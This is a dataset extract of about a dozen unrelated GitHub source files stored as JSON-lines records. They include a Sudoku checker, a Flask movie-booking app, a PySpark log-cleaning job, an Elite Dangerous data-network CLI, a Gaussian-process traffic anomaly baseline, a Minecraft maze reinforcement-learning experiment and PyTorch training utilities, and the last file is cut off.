\"\"\"\r\n longitude, latitude = cls.wgs84_to_gcj02(longitude, latitude)\r\n return cls.gcj02_to_bd09(longitude, latitude)\r\n\r\n @classmethod\r\n def _transform(cls, x, y):\r\n sqrt_x = math.sqrt(math.fabs(x))\r\n x_add = 300 + 1 * x + 2 * y + 0.1 * x * x + 0.1 * x * y + 0.1 * sqrt_x\r\n y_add = -100 + 2 * x + 3 * y + 0.2 * y * y + 0.1 * x * y + 0.2 * sqrt_x\r\n t_x = (20 * math.sin(6 * x * math.pi) + 20 * math.sin(2 * x * math.pi)) * 2 / 3\r\n x_add += t_x\r\n y_add += t_x\r\n x_add += (20 * math.sin(x * math.pi) + 40 * math.sin(x / 3 * math.pi)) * 2 / 3\r\n y_add += (20 * math.sin(y * math.pi) + 40 * math.sin(y / 3 * math.pi)) * 2 / 3\r\n x_add += (150 * math.sin(x / 12 * math.pi) + 300 * math.sin(x / 30 * math.pi)) * 2 / 3\r\n y_add += (160 * math.sin(y / 12 * math.pi) + 320 * math.sin(y * math.pi / 30)) * 2 / 3\r\n return x_add, y_add\r\n\r\n @classmethod\r\n def in_china(cls, longitude, latitude):\r\n \"\"\"\r\n 判断是否在国内,不在国内不做偏移\r\n\r\n :param longitude: 经度\r\n :param latitude: 纬度\r\n :return: 坐标是否在中国\r\n \"\"\"\r\n return 72.004 > longitude > 137.8347 and 0.8293 > latitude > 55.8271\r\n","repo_name":"007gzs/lbs","sub_path":"lbs/core/coord_convert.py","file_name":"coord_convert.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23852789971","text":"test_col = False\ntest_row = False\nboard = []\nfor i in range(1, 10):\n play_val = input(\"Enter your play: \")\n board.append(list(play_val))\nfor entries in board:\n print(entries)\nfor col in range(0, 9):\n col_check = []\n col_total = 0\n for row in range(0, 9):\n col_check.append(board[row][col])\n for element in col_check:\n col_total += int(element)\n if col_total == 45:\n test_col = True\n continue\n else:\n test_col = False\n print(\"No\")\n print(\"Error in column\", col+1)\n break\nfor row in range(0, 9):\n row_check = []\n row_total = 0\n for col in range(0, 9):\n row_check.append(board[row][col])\n for element in row_check:\n row_total += int(element)\n if row_total == 45:\n test_row = True\n continue\n else:\n test_row = False\n print(\"No\")\n print(\"Error in row\", row+1)\n break\ncol_start = 0\nrow_start = 0\ncol_end = 3 \nrow_end = 3\ntest_sect = False\n\nfor line in range(0, 9):\n sect_check = []\n sect_total = 0\n if line == 1:\n col_start = 3\n col_end = 6\n elif line == 2:\n col_start = 6\n col_end = 9\n elif line == 3:\n row_start = 3\n row_end = 6\n col_start =0\n col_end = 3\n elif line ==4:\n col_start =3\n col_end = 6\n elif line == 5:\n col_start = 6\n col_end=9\n elif line == 6:\n row_start = 6\n row_end = 9\n col_start =0\n col_end = 3\n elif line ==7:\n col_start =3\n col_end = 6\n elif line == 8:\n col_start = 6\n col_end=9\n for col in range(col_start, col_end):\n for row in range(row_start, row_end):\n sect_check.append(board[row][col])\n print(\"===\"*5)\n print(sect_check)\n for elements in sect_check:\n sect_total += int(elements)\n print(sect_total)\n if sect_total == 45:\n test_sect = True\n continue\n else:\n test_sect=False\n print(\"No\")\n print(\"Error in section \", line+1)\n break\n\n\nif test_col and test_row and test_sect:\n print(\"Yes\")\n\n\n#invalid soduku\n\"\"\"\n195743862\n432865917\n876192543\n387459216\n612387495\n549216738\n763524189\n928671354\n254938671\n\"\"\"\n\n#Valid soduku\n\"\"\"\n295743861\n431865927\n876192543\n387459216\n612387495\n549216738\n763524189\n928671354\n154938672\n\"\"\"\n","repo_name":"abdamsab/Python-Dcoder-files","sub_path":"Soduku.py","file_name":"Soduku.py","file_ext":"py","file_size_in_byte":2105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10441878195","text":"import numpy as np\nimport json\nfrom scipy import stats\n\nvocab = json.load(open(\"../VG-SGG-dicts-with-attri.json\", \"r\"))\nidx2lb = {int(k): v for k, v in vocab[\"idx_to_label\"].items()}\nlabelfeature = np.load(\"lb_feature.npy\")\nman_feature = labelfeature[78]\nfor i in range(150):\n other_feature = labelfeature[i]\n s = stats.pearsonr(man_feature, other_feature)\n print(idx2lb[i + 1])\n print(s)\n","repo_name":"wlxlatiao666/IETrans_test","sub_path":"graph_match/numpy_save.py","file_name":"numpy_save.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12807617598","text":"N = int(input())\nB = list(map(int, input().split()))\n\nA = []\n\ndef check(A, B, x):\n B.remove(x)\n A.append(x)\n\n if not B:\n return True\n if x * 2 in B:\n return check(A, B, x*2)\n if x % 3 == 0 and x // 3 in B:\n return check(A, B, x//3)\n return False\n\nfor i in range(N):\n A = []\n res = check(A, B.copy(), B[i])\n if res:\n print(*A)\n break\n","repo_name":"HJinS/AlgorithmPractice","sub_path":"AlgorithmMiddle/BruteForce/16936-re.py","file_name":"16936-re.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16475785080","text":"from agent import MineflayerAgent\nfrom dqn import DQNModel\nfrom visualnavigationmodel import VisualNavigationModel\n\nimport configuration\n\nfrom time import sleep\nimport torch\n\nimport maze_task\nimport maze\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\nagent = MineflayerAgent(viewer_port = 3007,name = \"yzy1\")\n\nmodel = VisualNavigationModel(7)\n\nmymaze = maze.Maze(width=configuration.MAZE_SIZE, height=configuration.MAZE_SIZE, seed=configuration.MAZE_SEED)\n\nmaze_task.build_maze(agent, mymaze)\n\nfor r in range(5):\n maze_task.reset_task(agent, mymaze)\n agent.bot.chat(\"Round \" + str(r))\n agentpov = agent.get_image()\n state=torch.tensor(agentpov.flatten(),dtype=torch.float32, device=device)\n last_action = torch.zeros([1,1], dtype=torch.float32, device=device)\n last_reward = torch.zeros([1,1], dtype=torch.float32, device=device)\n for i in range(100):\n # bot actions\n action = model.get_result(state, last_action, last_reward)\n \n agent.apply_action(maze_task.generate_action(action))\n \n # wait for the actions\n sleep(.5)\n agent.stop_movement()\n\n # calculate rewards\n reward = maze_task.reward(agent, mymaze)\n reward = torch.tensor([[reward]], device=device)\n\n observation = agent.get_image()\n next_state = torch.tensor(observation.flatten(), dtype=torch.float32, device=device)\n\n # Store the transition in memory\n model.save_to_memory(state, int(action), next_state, reward, last_action, last_reward)\n\n # Move to the next state\n state = next_state\n last_action = torch.tensor([[action]], device=device)\n last_reward = reward\n \n if i%10==9:\n msgtxt=str(r)+'-'+str(i)\n print(msgtxt,reward)\n\n # Perform one step of the optimization\n model.optimize()\n\nsleep(5)\n\nmaze_task.clear_maze(agent, mymaze)\n\n# model.save_network('RL_visualnavigation.pt')\n\ndel agent","repo_name":"Kallikalev/minecraftRL","sub_path":"experiment_maze.py","file_name":"experiment_maze.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5367131402","text":"from contextlib import _RedirectStream\nfrom flask import Flask,render_template,request\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = 'mysql+pymysql://root:@localhost/Movies'\ndb = SQLAlchemy(app)\n\nclass Booking_details(db.Model):\n sno = db.Column(db.Integer, primary_key=True)\n name=db.Column(db.String(50), nullable=False)\n email=db.Column(db.String(20),nullable=False)\n phone=db.Column(db.String,nullable=False)\n date=db.Column(db.String,nullable=False)\n time=db.Column(db.String,nullable=False)\n no_of_tickets=db.Column(db.Integer,nullable=False)\n movie=db.Column(db.String(50), nullable=False)\n \n\n@app.route(\"/\")\ndef home():\n return render_template('index.html')\n\n@app.route(\"/booking\", methods=['GET','POST'])\ndef booking():\n if(request.method=='POST'):\n name=request.form.get('name')\n email=request.form.get('email')\n phone=request.form.get('phone')\n date=request.form.get('date')\n time=request.form.get('time')\n no_of_tickets=request.form.get('no_of_tickets')\n movie=request.form.get('movie')\n\n entry=Booking_details(name=name,email=email,phone=phone,date=date,time=time,no_of_tickets=no_of_tickets,movie=movie)\n db.session.add(entry)\n db.session.commit()\n return render_template('seatbook.html')\n return render_template('booking.html')\n\n@app.route(\"/seatbook\")\ndef seatbook():\n return render_template('seatbook.html')\n\n\n@app.route(\"/confirm\")\ndef confirm():\n return render_template('confirm.html')\n\n\n\n\napp.run(debug=True)\n","repo_name":"Varsha-7007/Movies4You.github.io","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33610385586","text":"from pyspark.sql import SparkSession\n\n# 创建SparkSession\nspark = SparkSession.builder.appName(\"JsonParsingApp\").master(\"local[*]\").getOrCreate()\n\n# 读取本地文件\ninput_path = \"file:///Users/tangqiliang/Documents/files/openapi_logs/jsons/1102/1\"\ndf = spark.read.json(input_path)\ndf.createOrReplaceTempView(\"my_json\")\n\n# 进行数据清洗和处理\ncleaned_df = spark.sql(\"\"\"\n select \n data.company_id,\n data.suite_id, \n data.app_type,\n cast((`@filebeat_time` / 1000) as bigint) as t,\n data.response_code,\n replace(to_date(`@timestamp`),'-','') as access_date,\n from_unixtime(unix_timestamp(`@timestamp`, 'yyyy-MM-dd HH:mm:ss.SSS'), 'HH') as `hour`\n from my_json\n\"\"\")\n\n# cleaned_df.show()\n\n# 将数据写回本地文件\noutput_path = \"file:///Users/tangqiliang/Documents/files/openapi_logs/results/1102\"\ncleaned_df.repartition(3).write. \\\n mode(\"overwrite\"). \\\n format(\"parquet\"). \\\n save(output_path)\n\n# 停止SparkSession\nspark.stop()\n","repo_name":"tqllorry/tencentParse","sub_path":"openapi_logs/input_output_json.py","file_name":"input_output_json.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73432129003","text":"from .. import ERRORS\nfrom .. import __app_name__\nfrom .. import __version__\nfrom ..config import CONFIG_FILE_PATH\nfrom ..config import DEFAULT_CONFIG\nfrom ..config import load_config\nfrom configparser import ConfigParser\nfrom io import StringIO\nfrom logging.config import dictConfig\nfrom pathlib import Path\nfrom typing import Annotated\nfrom typing import Optional\nimport importlib\nimport logging\nimport pkgutil\nimport typer\n\n# configure module-level logging\nlogger = logging.getLogger(__name__)\n\n# create the CLI\napp = typer.Typer()\n\n# build a list of submodules\n__path__ = pkgutil.extend_path(__path__, __name__) # noqa: F821\n_submodules = [\n _modname\n for _importer, _modname, _ispkg in pkgutil.walk_packages(\n path=__path__, prefix=__name__ + \".\"\n )\n]\n\n# load submodules and add them as CLI subcommands\nfor _submodule in _submodules:\n _mdl = importlib.import_module(_submodule)\n\n # respect the module's external symbol list if present\n if \"__all__\" in _mdl.__dict__:\n _mdl_names = _mdl.__dict__[\"__all__\"]\n else:\n _mdl_names = [_sym for _sym in _mdl.__dict__]\n\n if \"app\" in _mdl_names:\n _subcommand = getattr(_mdl, \"app\")\n if \"help\" in _mdl_names:\n _help = getattr(_mdl, \"help\")\n else:\n _help = None\n if isinstance(_subcommand, typer.Typer):\n app.add_typer(_subcommand, name=_submodule.split(\".\")[-1], help=_help)\n\n\n@app.command()\ndef listen() -> None:\n \"\"\"Connect to the Elite Dangerous Data Network (EDDN).\"\"\"\n pass\n\n\ndef _version_callback(value: bool) -> None:\n if value:\n typer.echo(\n f\"{__app_name__} {__version__}, a free/libre/open source client for EDDN (and more)\"\n )\n typer.echo(\"Copyright (C) 2023 Matthew X. Economou\")\n typer.echo(\n \"License AGPLv3+: GNU AGPL version 3 or later .\"\n )\n typer.echo(\n \"Source code for this version can be found at .\"\n )\n raise typer.Exit()\n\n\n@app.callback()\ndef main(\n ctx: typer.Context,\n config_file: Annotated[\n Optional[Path],\n typer.Option(\n \"--config\",\n \"-f\",\n help=\"Override the default configuration file.\",\n ),\n ] = CONFIG_FILE_PATH,\n init_file: Annotated[\n Optional[Path],\n typer.Option(\n \"--init\",\n \"-i\",\n help=\"Override the default initialization file.\",\n ),\n ] = None,\n debug: Annotated[\n Optional[bool],\n typer.Option(\n \"--debug\",\n \"-d\",\n help=\"Enable detailed activity tracing.\",\n ),\n ] = None,\n quiet: Annotated[\n Optional[bool],\n typer.Option(\n \"--quiet\",\n \"-q\",\n help=\"Silence all program output.\",\n ),\n ] = None,\n verbose: Annotated[\n Optional[bool],\n typer.Option(\n \"--verbose\",\n \"-v\",\n help=\"Include backtraces in error messages.\",\n ),\n ] = None,\n version: Annotated[\n Optional[bool],\n typer.Option(\n \"--version\",\n help=\"Show the application's version and exit.\",\n callback=_version_callback,\n is_eager=True,\n ),\n ] = None,\n) -> None:\n ctx.obj = {} # user-defined shared state\n\n # configure logging\n dictConfig(\n {\n \"version\": 1,\n \"formatters\": {\n \"default\": {\n \"format\": \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n },\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"default\",\n },\n },\n \"loggers\": {\n \"alembic\": {\n \"level\": \"DEBUG\",\n \"propagate\": 1,\n },\n \"lethbridge\": {\n \"level\": \"DEBUG\",\n \"propagate\": 1,\n },\n \"sqlalchemy.engine\": {\n \"level\": \"DEBUG\",\n \"propagate\": 1,\n },\n },\n \"root\": {\n \"level\": \"DEBUG\" if debug else \"INFO\" if verbose else \"WARNING\",\n \"handlers\": [\"console\"] if not quiet else [],\n },\n }\n )\n\n # copy the default configuration\n config_string = StringIO()\n DEFAULT_CONFIG.write(config_string)\n config_string.seek(0)\n app_cfg = ConfigParser()\n app_cfg.read_file(config_string)\n\n # load the configuration file (overwrites the defaults)\n load_config_error = load_config(config_file, app_cfg)\n if load_config_error:\n typer.secho(ERRORS[load_config_error], fg=typer.colors.RED)\n raise typer.Exit(load_config_error)\n\n # pass global state like application configuration to other parts\n # of the UI via Typer's/Click's context object\n ctx.obj[\"config_file\"] = config_file\n ctx.obj[\"app_cfg\"] = app_cfg\n\n # run the initialization file\n if not init_file:\n init_file = app_cfg[\"cli\"][\"init_file\"]\n try:\n exec(compile(open(init_file, \"rb\").read(), init_file, \"exec\"))\n except FileNotFoundError as e:\n logger.debug(e)\n except Exception as e:\n logger.warning(e)\n return\n","repo_name":"irtnog/lethbridge","sub_path":"src/cli/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"41389690732","text":"\"\"\"Module to contain the GP Model Class\"\"\"\n\nimport tensorflow as tf\nfrom sklearn.preprocessing import MinMaxScaler\n\nimport pandas as pd\nimport numpy as np\n\nimport gpflow\n\n# from gpflow.utilities import print_summary, set_trainable\n\nimport joblib\n\n\nclass GPLandscape:\n \"\"\"Class which manages the training, saving and loading of GP models for an array of detectors\"\"\"\n\n def __init__(self):\n self.models = None\n self.model_last_update_start = None\n self.model_last_update_end = None\n self.model_detector_id = None\n self.scalers = None\n\n def train_save_detector(\n self, scoot_df: pd.DataFrame, days_in_past: int, detector: str, kern=None\n ):\n \"\"\"Trains GP a to one detector, using a SCOOT dataframe format. The trained model is\n then saved in a directory along with other useful model data such as scalers\n Args:\n df: SCOOT dataframe of one detector used for training\n days_in_past: how many most recent days of past dataframe should be used for training\n detector: detector_id as string\n kern: Optional kernel choice\n Returns:\n last_update_start: date for which the detector was trained\n det: name of detector\n \"\"\"\n\n # set Y and X to our days_in_past used for fitting, reshape, and scale\n det = scoot_df[\"detector_id\"].unique()[0]\n Y = (\n scoot_df[\"n_vehicles_in_interval\"]\n .tail(n=24 * days_in_past)\n .to_numpy()\n .reshape(-1, 1)\n )\n last_update_start = (\n scoot_df[\"measurement_end_utc\"].tail(n=24 * days_in_past).min()\n )\n last_update_end = (\n scoot_df[\"measurement_end_utc\"].tail(n=24 * days_in_past).max()\n )\n Y = Y.astype(float)\n X = np.arange(1, len(Y) + 1, dtype=float).reshape(-1, 1)\n\n scaler = MinMaxScaler(feature_range=(-1, 1))\n y = scaler.fit_transform(Y)\n\n # iniialise kernel\n if kern is None:\n\n kern_pd = gpflow.kernels.Periodic(gpflow.kernels.SquaredExponential())\n kern_pw = gpflow.kernels.Periodic(gpflow.kernels.SquaredExponential())\n kern_se = gpflow.kernels.SquaredExponential()\n\n kern_pd.period.assign(24.0)\n kern_pw.period.assign(168.0)\n # kern_SE.lengthscales.assign(100)\n\n k = kern_pd * kern_pw + kern_se\n else:\n k = kern\n\n # fit our GP to X & y\n model = gpflow.models.GPR(data=(X, y), kernel=k, mean_function=None)\n opt = gpflow.optimizers.Scipy()\n\n # optimise GP performance\n opt.minimize(\n model.training_loss, model.trainable_variables, options=dict(maxiter=100)\n )\n\n # save model as TF module under detector name\n frozen_model = gpflow.utilities.freeze(model)\n module_to_save = tf.Module()\n predict_fn = tf.function(\n frozen_model.predict_f,\n input_signature=[tf.TensorSpec(shape=[None, 1], dtype=tf.float64)],\n )\n module_to_save.predict = predict_fn\n\n # save path\n save_dir = str(\"gp_models/\" + detector + \"/\")\n tf.saved_model.save(module_to_save, save_dir)\n\n scaler_filename = str(save_dir + \"scaler.gz\")\n joblib.dump(scaler, scaler_filename)\n\n return last_update_start, last_update_end, det\n\n def train_save_landscape(self, scoot_df: pd.DataFrame, days_in_past: int):\n \"\"\"Trains GPs to multiple detectors passed to it in SCOOT dataframe format. Trained models are\n saved in directories\n\n Args:\n scoot_df: SCOOT dataframe used to train multiple detector models\n days_in_past: how manyt most recent days of past dataframe should be used for training\n \"\"\"\n\n detectors = scoot_df[\"detector_id\"].unique()\n\n last_update_starts = []\n last_update_ends = []\n saved_detectors = []\n\n for i, detector in enumerate(detectors, 1):\n single_detector_df = scoot_df[scoot_df[\"detector_id\"] == detector]\n\n try:\n date, end_date, det = self.train_save_detector(\n single_detector_df, days_in_past, detector\n )\n except:\n print(detector, \" Matrix not invertible\")\n continue\n\n last_update_starts.append(date)\n last_update_ends.append(end_date)\n saved_detectors.append(det)\n print(\"please wait: \", i, \"/\", len(detectors), end=\"\\r\")\n\n pd.DataFrame(\n {\n \"detectors\": saved_detectors,\n \"last_update_start\": last_update_starts,\n \"last_update_end\": last_update_ends,\n }\n ).to_csv(\"gp_models/det_date.csv\", index=False)\n\n def load_landscape(self):\n \"\"\"Loads array of pre-trained models and model data as arays from file, and\n sets them to the class variable\"\"\"\n\n models = []\n scalers = []\n\n det_date = pd.read_csv(\"gp_models/det_date.csv\", index_col=False)\n detectors = det_date[\"detectors\"].to_numpy()\n dates = det_date[\"last_update_start\"].astype(\"datetime64[h]\").to_numpy()\n end_dates = det_date[\"last_update_start\"].astype(\"datetime64[h]\").to_numpy()\n\n for i, detector in enumerate(detectors, 1):\n\n save_dir = str(\"gp_models/\" + detector + \"/\")\n scaler_filename = str(save_dir + \"scaler.gz\")\n models.append(tf.saved_model.load(save_dir))\n scalers.append(joblib.load(scaler_filename))\n print(\"please wait: \", i, \"/\", len(detectors), end=\"\\r\")\n\n self.models = models\n self.model_detector_id = detectors\n self.model_last_update_start = dates\n self.model_last_update_end = end_dates\n self.scalers = scalers\n\n def count_baseline(\n self, scoot_df: pd.DataFrame, detectors: list = None\n ) -> pd.DataFrame:\n \"\"\"Produces a DataFrame where the count and baseline can be compared for use\n in scan statistics\n\n Args:\n scoot_df: Dataframe of processed SCOOT data which we want to compare to model\n detectors: List of detectors to compare to forecasts. Default behaviour\n retrieves forecasts for all detectors present in input dataframe.\n\n Returns:\n forecast_df: Dataframe of SCOOT vehicle counts and baseline estimates\"\"\"\n\n pd.options.mode.chained_assignment = None\n\n if detectors is None:\n detectors = scoot_df[\"detector_id\"].drop_duplicates().to_numpy()\n\n detectors_in=np.intersect1d(detectors, self.model_detector_id)\n if(detectors_in!=detectors):\n print(\"No saved models for: \", np.setdiff1d(detectors, detectors_in))\n print(\"Calculating for remaining detectors...\")\n detectors=detectors_in\n\n\n framelist = []\n\n for i, detector in enumerate(detectors, 1):\n print(\"please wait: \", i, \"/\", len(detectors), end=\"\\r\")\n\n one_detector_df = scoot_df.loc[scoot_df[\"detector_id\"] == detector]\n\n start_of_trained_data = self.model_last_update_start[\n np.where(self.model_detector_id == detector)\n ]\n\n baseline_range = (\n (one_detector_df[\"measurement_end_utc\"] - start_of_trained_data[0])\n .to_numpy()\n .astype(\"timedelta64[h]\")\n )\n baseline_range = baseline_range + np.timedelta64(1, \"h\")\n\n loc = np.where(self.model_detector_id == detector)\n\n baseline_range = baseline_range.reshape(-1, 1)\n model = self.models[loc[0][0]]\n scaler = self.scalers[loc[0][0]]\n\n mean, var = model.predict(baseline_range)\n mean = scaler.inverse_transform(mean)\n var = scaler.inverse_transform(var)\n\n one_detector_df.rename(\n columns={\"n_vehicles_in_interval\": \"count\"}, inplace=True,\n )\n\n one_detector_df = one_detector_df.assign(baseline=mean.flatten().tolist())\n one_detector_df = one_detector_df.assign(\n upper_99=(3 * np.sqrt(var.flatten()) + mean.flatten()).tolist()\n )\n one_detector_df = one_detector_df.assign(\n lower_99=(mean.flatten() - 3 * np.sqrt(var.flatten())).tolist()\n )\n one_detector_df = one_detector_df.assign(\n prediction_variance=var.flatten().tolist()\n )\n\n framelist.append(one_detector_df)\n\n return pd.concat(framelist)\n","repo_name":"TeddyTW/SpatialScan","sub_path":"SpatialScan/scoot_gp.py","file_name":"scoot_gp.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"39315501603","text":"a1 = list(map(int, input().split()))\na2 = list(map(int, input().split()))\na3 = list(map(int, input().split()))\na = []\na.append(a1)\na.append(a2)\na.append(a3)\nbingo = [[0] * 3 for i in range(3)]\nn = int(input())\nfor i in range(n):\n b = int(input())\n for j in range(3):\n for h in range(3):\n if a[j][h] == b:\n bingo[j][h] = 1\nfor i in range(3):\n if bingo[i][0] + bingo[i][1] + bingo[i][2] == 3:\n print(\"Yes\")\n quit()\n elif bingo[0][i] + bingo[1][i] + bingo[2][i] == 3:\n print(\"Yes\")\n quit()\nif (\n bingo[0][0] + bingo[1][1] + bingo[2][2] == 3\n or bingo[0][2] + bingo[1][1] + bingo[2][0] == 3\n):\n print(\"Yes\")\n quit()\nprint(\"No\")\n","repo_name":"Lotka-Volterra/ABC","sub_path":"ABC151-175/abc157/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29890911916","text":"from torchvision import transforms\nfrom PIL import Image\nimport glob\nimport torch\nimport cv2\nimport numpy as np\nimport os\nimport csv\nfrom pathlib import Path\nimport torch.nn as nn\nimport math\nimport time\nimport random\nfrom tools.visualizer import RedundancyVisualizer\nimport pandas as pd\nfrom tools.draw_plot import AvgPlot\nfrom Config import ConfigBase\nfrom numpy import mean\nimport matplotlib\nfrom PIL import Image, ImageDraw\nfrom copy import deepcopy\nimport threading\n\nVALID_START_POINT: int = 0\n\n\nclass saveThread(threading.Thread):\n def __init__(self, model_now, pth_now):\n threading.Thread.__init__(self)\n self.model_now = model_now\n self.pth_now = pth_now\n\n def run(self):\n torch.save(self.model_now, self.pth_now)\n\n\ndef int2tuple(i: int):\n return (i, i) if isinstance(i, int) else i\n\n\ndef str_size(input_size: tuple, input_size_b: tuple = None):\n input_size = int2tuple(input_size)\n str_input_size = \"{}x{}\".format(input_size[0], input_size[1])\n\n if input_size_b:\n input_size_b = int2tuple(input_size_b)\n str_input_size += \"&{}x{}\".format(input_size_b[0], input_size_b[1])\n\n return str_input_size\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = True\n\n\nclass SaveLastModel(object):\n '''\n save the newest parameters\n '''\n def __init__(self, fold: int, save_path: str):\n self.save_path = save_path\n self.pth_last = \"not_exists\"\n self.fold = str(fold)\n Path(save_path).mkdir(parents=True, exist_ok=True)\n self.savethread = None\n\n def update(self, model_now: nn.Module, epoch_now: int):\n self.pth_now = os.path.join(self.save_path, \"Model-fold-{}-state-{}.pth\".format(self.fold, epoch_now))\n Path(self.pth_last).unlink(missing_ok=True)\n if isinstance(model_now, nn.DataParallel):\n model_now = model_now.module\n\n model_now = deepcopy(model_now.state_dict())\n self.savethread.join() if self.savethread is not None else ...\n self.savethread = saveThread(model_now, self.pth_now)\n self.savethread.start()\n\n self.pth_last = self.pth_now\n\n\nclass RecordRes(object):\n def __init__(self, fold: int, log_path: str = None):\n self.fold = fold\n if log_path:\n self.log_path = os.path.join(log_path, \"csv\", str(fold))\n Path(self.log_path).mkdir(parents=True, exist_ok=True)\n self.log_path = os.path.join(log_path, \"csv\", str(fold), \"Record_acc_auc_kappa.csv\")\n Path(self.log_path).touch(exist_ok=True)\n _ = open(self.log_path, 'w').close()\n self.csv_file = open(self.log_path, \"w\")\n self.writer = csv.writer(self.csv_file)\n\n def update(self, acc_now: float, auc_now: float, kappa_now: float):\n self.writer.writerow([float(acc_now), float(auc_now), float(kappa_now)])\n\n def close(self):\n try:\n self.csv_file.close()\n except:\n _ = 0\n\n def __del__(self):\n self.close()\n\n\nclass RecordBestRes(object):\n def __init__(self, fold: int, log_path: str, first: str = \"acc\", is_save_model: bool = True):\n self.MAX_ACC = -1.0\n self.MAX_AUC = -1.0\n self.MAX_KAP = -1.0\n self.Epoch = -1\n self.first = first.lower()\n self.fold = fold\n self.is_save_model = is_save_model\n\n Path(log_path).mkdir(parents=True, exist_ok=True)\n self.log_path = os.path.join(log_path, \"RecordBestRes.log\")\n self.pth_path = os.path.join(log_path, \"Model-fold-{}-First-{}.pth\".format(self.fold, self.first))\n Path(self.log_path).touch(exist_ok=True)\n self.savethread = None\n\n def update(self, model_now: nn.Module, epoch_now: int, acc_now: float, auc_now: float, kappa_now: float):\n if self.first == \"acc\" or \"acc\" in self.first:\n if acc_now > self.MAX_ACC:\n self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n return\n\n if acc_now == self.MAX_ACC:\n if acc_now >= self.MAX_ACC:\n self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n return\n\n if self.first == \"auc\" or \"auc\" in self.first:\n if auc_now > self.MAX_AUC:\n self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n return\n\n if auc_now == self.MAX_AUC:\n if acc_now >= self.MAX_ACC:\n self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n return\n\n if self.first == \"kappa\" or \"kap\" in self.first:\n if kappa_now > self.MAX_KAP:\n self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n return\n\n if kappa_now == self.MAX_KAP:\n if acc_now >= self.MAX_ACC or auc_now >= self.MAX_AUC:\n self.__update(model_now, epoch_now, acc_now, auc_now, kappa_now)\n return\n\n def conclusion(self):\n conclusion = \"Fold {}, {} first: Best ACC= {} AUC= {} Kappa= {} @ Epoch {} .\\n\".format(\n self.fold, self.first, self.MAX_ACC, self.MAX_AUC, self.MAX_KAP, self.Epoch)\n print(conclusion)\n\n if self.log_path:\n with open(self.log_path, \"a\") as file:\n file.write(conclusion)\n return conclusion\n\n def __update(self, model_now: nn.Module, epoch_now: int, acc_now: float, auc_now: float, kap_now: float):\n if epoch_now >= VALID_START_POINT:\n self.MAX_ACC = acc_now\n self.MAX_AUC = auc_now\n self.MAX_KAP = kap_now\n self.Epoch = epoch_now\n if self.is_save_model:\n Path(self.pth_path).unlink(missing_ok=True)\n if isinstance(model_now, nn.DataParallel):\n model_now = model_now.module\n\n # torch.save(model_now.state_dict(), self.pth_path)\n\n model_now = deepcopy(model_now.state_dict())\n self.savethread.join() if self.savethread is not None else ...\n self.savethread = saveThread(model_now, self.pth_path)\n self.savethread.start()\n\n return self\n\n\nclass SaveCSV(object):\n def __init__(self, csv_path: str, fold_num: int, epoch: int):\n csv_dir = os.path.join(csv_path, \"csv\", str(fold_num))\n Path(csv_dir).mkdir(parents=True, exist_ok=True)\n self.csv_path = os.path.join(csv_dir, 'Joint-fold-{}-state-{}-Result.csv'.format(fold_num, epoch))\n Path(self.csv_path).touch(exist_ok=True)\n self.csv_file = open(self.csv_path, \"w\")\n self.writer = csv.writer(self.csv_file)\n\n def write(self, data: list):\n self.writer.writerow(data)\n\n def close(self):\n try:\n self.csv_file.close()\n except:\n _ = 0\n\n def __del__(self):\n self.close()\n\n\ndef extract_maximum_connected_area(mat, threshold: int = 110):\n contours, _ = cv2.findContours(mat, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n area = []\n for j in range(len(contours)):\n area.append(cv2.contourArea(contours[j]))\n\n max_idx = np.argmax(area)\n for k in range(len(contours)):\n if k != max_idx:\n cv2.fillPoly(mat, [contours[k]], 0)\n\n _, mat = cv2.threshold(mat, threshold, 255, cv2.THRESH_BINARY)\n return mat\n\n\ndef tensor2array(tensor):\n array1 = tensor.cpu().detach().numpy()\n maxValue = array1.max()\n array1 = array1 * 255 / maxValue\n mat = np.uint8(array1)\n mat = mat.transpose(1, 2, 0)\n mat = cv2.cvtColor(mat, cv2.COLOR_RGB2BGR)\n mat = cv2.cvtColor(mat, cv2.COLOR_BGR2GRAY)\n return mat\n\n\ndef get_concat_v(im1, im2, mod: str = \"L\"):\n dst = Image.new(mod, (im1.width, im1.height + im2.height))\n dst.paste(im1, (0, 0))\n 